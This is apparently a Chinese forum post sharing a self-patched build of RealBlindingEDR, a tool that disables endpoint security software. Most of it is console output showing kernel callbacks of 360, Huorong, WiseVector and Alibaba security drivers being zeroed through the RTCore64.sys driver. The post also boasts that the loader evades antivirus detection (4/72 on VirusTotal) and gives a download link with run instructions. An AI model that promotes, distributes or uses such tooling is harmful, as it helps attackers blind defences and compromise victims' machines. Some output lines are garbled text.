自己搞的一个patch版哈
可以在最新版的Windows 11 Pro 25H2 26200.5761正常运行
测试结果:
PS C:\Users\Administrator\Desktop\Kill> .\RealBlindingEDR_Auto.exe
鉁?SeLoadDriverPrivilege 宸插惎鐢
_______ __ ______ __ _ __ _ ________ ______ _______
|_ __ \ [ ||_ _ \[ | (_) | ](_) |_ __ |_ _ `|_ __ \
| |__) | .---. ,--. | | | |_) || | __ _ .--. .--.| | __ _ .--. .--./)| |_ \_| | | `. \| |__) |
| __ / / /__\`'_\ : | | | __'.| |[ |[ `.-. / /'`\' |[ |[ `.-. |/ /'`\;| _| _ | | | || __ /
_| | \ \| \__.// | |,| | _| |__) | | | | | | | | \__/ | | | | | | |\ \._/_| |__/ |_| |_.' _| | \ \_
|____| |___'.__.\'-;__[___|_______[___[___[___||__'.__.;__[___[___||__.',__|________|______.|____| |___|
( ( __))
OK
X椹卞姩鍔犺浇澶辫触 0xc0000034Windows version: 10.0.26200
Successfully connected to RTCore64.sys
[+] Starting EDR callback cleanup...
0xfffff80192f04fc0, 0xfffff80192f04dc0, 0xfffff80192f051c0----------------------------------------------------
Register driver for PsSetCreateProcessNotifyRoutine callback:
----------------------------------------------------
tm.sys
fvevol.sys
FLTMGR.SYS
watchdog.sys
tcpip.sys
iorate.sys
CI.dll
UCPD.sysdst=fffff80192f04ff8,value=0x000000000000000000
[Clear]
360FsFlt.sysdst=fffff80192f05000,value=0x000000000000000000
[Clear]
360Box64.sysdst=fffff80192f05008,value=0x000000000000000000
[Clear]
360AntiSteal64.sysdst=fffff80192f05010,value=0x000000000000000000
[Clear]
360netmon.sysdst=fffff80192f05018,value=0x000000000000000000
[Clear]
sysdiag.sysdst=fffff80192f05020,value=0x000000000000000000
[Clear]
amdfendr.sys
AtihdWT6.sys
peauth.sys
gameflt.sys
WiseVectorHIPS_X64.sysdst=fffff80192f05048,value=0x000000000000000000
[Clear]
WiseVectorHIPS_X64.sysdst=fffff80192f05050,value=0x000000000000000000
[Clear]
ahflt.sys
AliPaladinEx64.sys
AliPaladinEx64.sys
360AntiHijack64.sysdst=fffff80192f05070,value=0x000000000000000000
[Clear]
----------------------------------------------------
Register driver for PsSetCreateThreadNotifyRoutine callback:
----------------------------------------------------
mmcss.sys
fvevol.sys
360FsFlt.sysdst=fffff80192f04dd0,value=0x000000000000000000
[Clear]
sysdiag.sysdst=fffff80192f04dd8,value=0x000000000000000000
[Clear]
WiseVectorHIPS_X64.sysdst=fffff80192f04de0,value=0x000000000000000000
[Clear]
AliPaladinEx64.sys
----------------------------------------------------
Register driver for PsSetLoadImageNotifyRoutine callback:
----------------------------------------------------
fvevol.sys
360FsFlt.sysdst=fffff80192f051c8,value=0x000000000000000000
[Clear]
sysdiag.sysdst=fffff80192f051d0,value=0x000000000000000000
[Clear]
sysdiag.sysdst=fffff80192f051d8,value=0x000000000000000000
[Clear]
ahcache.sys
fvevol.sys
AtihdWT6.sys
WiseVectorHIPS_X64.sysdst=fffff80192f051f8,value=0x000000000000000000
[Clear]
AliPaladinEx64.sys
----------------------------------------------------
Drivers that register ObRegisterCallbacks:
----------------------------------------------------
dst=ffffb90a29af96b8,value=0x000000000000000000
Process PreOperation: 360FsFlt.sys [Clear]
dst=ffffb90a29af96c0,value=0x000000000000000000
Process PostOperation: 360FsFlt.sys [Clear]
dst=ffffb90a293f7d58,value=0x000000000000000000
Process PreOperation: UCPD.sys [Clear]
dst=ffffb90a29afc178,value=0x000000000000000000
Process PreOperation: 360Box64.sys [Clear]
dst=ffffb90a29afc180,value=0x000000000000000000
Process PostOperation: 360Box64.sys [Clear]
dst=ffffb90a29afa7f8,value=0x000000000000000000
Process PreOperation: sysdiag.sys [Clear]
Process PreOperation: AliPaladinEx64.sys
dst=ffffb90a29af96f8,value=0x000000000000000000
Thread PreOperation: 360FsFlt.sys [Clear]
dst=ffffb90a29af9700,value=0x000000000000000000
Thread PostOperation: 360FsFlt.sys [Clear]
dst=ffffb90a293f7d98,value=0x000000000000000000
Thread PreOperation: UCPD.sys [Clear]
dst=ffffb90a29afc1b8,value=0x000000000000000000
Thread PreOperation: 360Box64.sys [Clear]
dst=ffffb90a29afc1c0,value=0x000000000000000000
Thread PostOperation: 360Box64.sys [Clear]
dst=ffffb90a29afa838,value=0x000000000000000000
Thread PreOperation: sysdiag.sys [Clear]
----------------------------------------------------
Drivers that register CmRegisterCallback:
----------------------------------------------------
[Clear all below]
ahflt.sys
fvevol.sys
360FsFlt.sys
360Box64.sys
360netmon.sys
WiseVectorHIPS_X64.sys
AliPaladinEx64.sys
UCPD.sys
sysdiag.sys
ntoskrnl.exe
bfs.sys
----------------------------------------------------
Drivers that register MiniFilter Callback:
----------------------------------------------------
0xfffff80123d43ac0
FLT_FRAME: 0xffffdd03783c7280
dst=ffffdd03783c7280,value=0x000000000000000000
FLT_FILTERAddr is: 0x0x1
FLT_FILTERAddr is: 0x20000000000
PS C:\Users\Administrator\Desktop\Kill>
火绒 360 智量 回调全被清零,其中360智量全程无反应
火绒kill驱动(若提前加驱则无反应)
loader免杀
VT4/72
https://www.virustotal.com/gui/file/c908c142a48247984b0c44670a059a7f7c5377c1dc1e0262eb8cda7a02bcff0a
下载链接:
https://www.123865.com/s/RqMTjv-sDDfv需要“在此处打开终端”然后.\RealBlindingEDR_Auto.exe运行。
|